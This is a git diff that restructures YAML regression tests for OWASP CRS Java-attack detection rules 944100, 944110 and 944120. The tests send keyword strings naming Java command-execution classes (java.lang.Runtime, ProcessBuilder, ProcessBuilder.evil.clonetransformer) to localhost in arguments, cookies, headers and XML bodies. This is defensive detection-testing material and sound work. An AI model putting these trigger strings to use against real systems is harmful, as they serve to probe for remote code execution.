"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8c9..294ee8250 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,373 +1,354 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_id: 2 desc: Argument test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_id: 3 desc: Argument name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_id: 5 desc: Cookie test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 6 desc: Cookie test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 7 desc: Cookie name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 8 desc: Cookie name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 9 desc: Request header test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 10 desc: Request header test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 11 desc: XML element includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_id: 13 desc: XML attribute value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_id: 15 desc: XML element includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_id: 17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index b1c48a52e..3701d12e9 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -1,2945 +1,2808 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 